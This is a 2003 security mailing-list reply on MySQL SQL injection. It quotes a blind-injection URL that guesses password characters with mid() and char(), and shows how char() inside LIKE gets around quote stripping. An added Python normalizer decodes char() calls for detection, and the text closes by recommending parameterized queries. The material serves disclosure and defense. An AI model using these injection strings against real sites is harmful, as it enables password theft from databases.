hola,

On 20 Feb 2003 20:36:11 -0000 Lucas Armstrong <lucas@cgishield.com> wrote:

> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories

JFYI: this may be off topic, but it is worth mentioning ... a couple of months ago we found out that the mysql char() function can be used within the "like() - function" to place quotes. This may help somebody doing sql-injection in a "quote-stripped :-)" environment.

example query:

---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---

and now "without" quotes:

---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---

...

nice day,
mEi

-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
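The post shows why stripping quotes from request parameters is not a sufficient defense: a MySQL char() call builds the same string without any quote character, so a filter or log reviewer that only looks for quotes never sees the "%root%" or 'a' the query actually compares against. The following is an added example from the editor, not code from the post or from WebSec.org; it normalizes request parameters by decoding char(n,n,...) calls back into the quoted string they produce, so that a quote-aware filter or a log review sees the intended value. The sample URL is constructed after the one quoted in the post (host "site" is a placeholder) and the function names are the editor's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request, modelled on the URL quoted in the post.
# "site" is a placeholder host, not a real target.
SAMPLE_URL = (
    "http://site/modules.php?name=search&query=&topic=&category=&author="
    "&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories"
)

# Matches MySQL char(...) with one or more comma-separated decimal codes,
# e.g. char(97) or char(37,114,111,111,116,37). Case-insensitive, as MySQL is.
CHAR_CALL = re.compile(
    r"char\s*\(\s*((?:\d{1,3}\s*,\s*)*\d{1,3})\s*\)", re.IGNORECASE
)


def decode_char_calls(value: str) -> str:
    """Replace every char(n, n, ...) call in `value` with the quoted string it builds.

    Codes above 255 are dropped: the post discusses single-byte (ASCII) output,
    so the decoder assumes one byte per code and interprets them as latin-1.
    """
    def repl(match: re.Match) -> str:
        codes = [int(c) for c in match.group(1).split(",")]
        text = bytes(c for c in codes if c < 256).decode("latin-1")
        return "'" + text + "'"

    return CHAR_CALL.sub(repl, value)


def suspicious_params(url: str) -> dict:
    """Return {param: decoded_value} for each parameter whose value contained a char() call.

    parse_qs splits on the first '=' only, so a value such as
    '1+or+mid(a.pwd,3,1)=char(97)' survives intact, with '+' decoded to a space.
    """
    query = urlsplit(url).query
    flagged = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_char_calls(raw)
            if decoded != raw:
                flagged[name] = decoded
    return flagged


if __name__ == "__main__":
    # The LIKE pattern from the post, decoded back to what the database compares against.
    print(decode_char_calls("user() like char(37,114,111,111,116,37)"))
    # The quoted URL: only the 'days' parameter carries a char() call.
    print(suspicious_params(SAMPLE_URL))
```

Running the normalizer before any quote-based check is what makes that check meaningful; the more robust fix, which this example does not replace, is to bind user input as query parameters rather than splice it into SQL text at all.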